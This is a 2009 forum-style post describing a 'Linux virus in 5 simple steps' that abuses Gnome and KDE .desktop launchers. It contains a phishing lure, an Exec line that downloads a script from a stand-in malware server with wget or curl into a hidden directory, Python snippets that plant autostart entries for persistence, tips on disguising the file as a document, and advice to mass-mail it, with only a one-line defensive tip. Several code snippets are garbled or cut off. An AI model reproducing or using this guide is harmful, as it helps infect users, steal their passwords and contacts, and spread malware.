Don't save attachments unless from a trusted and secure source. Also, watch out for infected USB sticks. Always reformat those, even new ones not found outside in the parking lot.
Link: Geek Zone
linux, posted: 11-Feb-2009 06:33
I should point out: The vulnerabilities we will be taking advantage of are 'features' of the most popular modern Linux desktop environments, Gnome and KDE. The actual core of Linux itself does not have any of these vulnerabilities. A Linux (or any other *nix) system without running Gnome or KDE will not exhibit any of these problems, which is one of the huge advantages of properly separating the core OS from other applications such as the desktop environment.
Getting users to open attachments: Check out these nude shots!
So, the email will have to read something like:
Whoa, check out these nude shots of...!
(if the attachment doesn't want to open just save it to your desktop and open it...)
That would sound suspicious to most of us, but 'most' is not 'all' and user stupidity is everywhere. Besides, many users of web-based email clients are used to the save-first routine anyway.
Getting attachments to execute
When you save an email attachment under Linux, the execute flag is normally NOT set and thus, the file can't be executed just by clicking on it. So, no luck?
Not so fast. Modern desktop environments, such as Gnome and KDE, conveniently offer a nice "workaround" called 'launchers'. Those are small files that describe how something should be started. Just a few lines that specify the name, the icon that should be displayed and the actual command to execute. Conveniently, the syntax of those launcher files is the same for Gnome and KDE. And those launchers don't have to have any execute permissions set on them! Desktop environments treat those files as a special case, so when you click on them Gnome or KDE will happily execute the command that was specified within the launcher description and without the need for the execute bit to be set on the launcher itself. Now we are getting somewhere!
You don't need to be root to 0wn someone
None of that so far required root privileges. And our script now can do whatever it wishes to do within the confines of the user account. Confined it may be, but that doesn't prevent the possibility of significant damage to be done.
For example, it can start to pilfer through the user's address book to harvest email addresses, send them off to our malware server, start sending spam email or it can spread itself by email. It can install a Firefox extension that captures passwords as the user types them. It may start to share the user's desktop via VNC without the user's knowledge. It can start a background daemon that pops up ads. Linux adware!
Autostart after reboot
Users do not need root privileges in order to configure certain applications for autolaunch when they are logging into their own user sessions. That is because they are only making changes to their own session and user account, not the underlying system settings.
Fortunately, the modern desktop environments have their own set of commands which they are autostarting on login. In the case of Gnome, take a look at what you find in ~/.config/autostart (this directory may not exist yet, if you have not configured any apps for autostart). That's right! More launchers! Those are run every time the user logs into Gnome. For KDE it's even simpler: Just link to your executable from within the ~/.kde/Autostart directory.
Our malware then only needs to create an appropriate entry in those directories and it will start to run whenever the user logs in!
Compact step-by-step guide
Ok, so here is the summary then, which also fills in a few more specific details:
1. Write a piece of malware of your choice. Maybe as a Python script? Good language, efficient code, pre-installed in most Linux distros and powerful standard library support (for example, libraries for sending HTTP requests and handling SMTP are part of most standard installs). Place that malware on some web-server.
2. Your malware needs the ability to install a launcher for itself so that it is started whenever the user logs in. As mentioned, for Gnome that means creating a launcher description in the ~/.config/autostart folder. For KDE just link to your executable from within the ~/.kde/Autostart directory. To do that the malware code can either just force the issue and copy a launcher or link to itself into both locations (creating any directories along the way if they don't exist) or it can be a bit smarter and choose the right thing to do based on the desktop environment that it detects.
For example, to create the shortcut for KDE, all you need to write in Python is:
uname = os.getlogin()
drop_dir = “/home/%s/.kde/Autostart” % uname)
os.symlink("/home/%s/.local/.hidden/s.py" % uname, drop_dir+“/s.py")
For Gnome the Python script instead needs to write a launcher into the proper directory:
relauncher_str = """
uname = os.getlogin()
drop_dir = “/home/%s/.config/autostart” % uname
f = open(drop_dir+”/Malware.desktop”, “w”)
Writing these autostart entries is probably some of the first action that your malware should perform.
3. Now create a desktop launcher file for the installer of the malware, which is different than the launcher we use to restart the malware after a reboot. The desktop launcher for the installer is what we send as attachment in the email to the targeted user. It's what the user clicks on after they saved it. Try something like this:
Exec=bash -c 'URL=http://www.my_malware_server.com/s.py ;
mkdir -p $DROP;
if [ -e /usr/bin/wget ] ;
then wget $URL -O $DROP/s.py ;
else curl $URL -o $DROP/s.py ; fi;
Note that we have specified a name that is harmless looking and even chose an icon that makes it look like a normal document (that particular icon is present on both Ubuntu (Gnome) and Kubuntu (KDE) systems, but annoyingly not on Fedora). If you claim to send nude shots in the email, just give it a name that makes it sound like an image (something with .jpg at the end) and chose one of the appropriate standard image icons.
The Exec line is a bit longer now, because we have to account for the possibility that either wget is installed or curl. For example, Ubuntu systems usually have wget, while Fedora comes with curl. So, we pass the appropriate commands to bash in order to check which one is present and then call the correct command to download the malware. I'm not a bash expert, so there might be a much more efficient way to do this. But you get the idea. Also, in that line we are creating a good location for the script ($DROP), which is not immediately obvious. The mkdir command with the -p option will silently create whatever parent directories are necessary. The target directory is in the user's home, hidden away in some innocent looking local directory and can only be seen when also displaying hidden files. The /tmp directory of course is not a good place for our malware, since it is wiped with each reboot.
Save this launcher file under the name you specified with the Name line, but add '.desktop' to the end of the actual file name. So, in our case, you would save the file as 'some_text.odt.desktop'. When you place this on your desktop you will see that Gnome or KDE will treat it in a special way, not displaying the '.desktop' extension. So, the file just appears as 'some_text.odt'. Of course, that also means that the mail attachment will have this extension as well. Some users may notice, many others will not.
4. Attach this file to an email, which prompts the recipient to save and open the attachment. As explained, once it has been saved it will just appear as 'some_text.odt' on the user's desktop. And with the icon we have chosen in the launcher description it will look quite harmless.
5. Send this email out to as many email addresses as you can get a hold of.
Voila! A Linux virus in 5 simple steps. Every user that saves and opens the attachment you have sent them will get themselves infected with the malware script of your choice, which is then also restarted whenever the user logs in again.
Solutions for the problem
The easiest solution to prevent this kind of problem is to not just blindly click on attachments that people have sent you.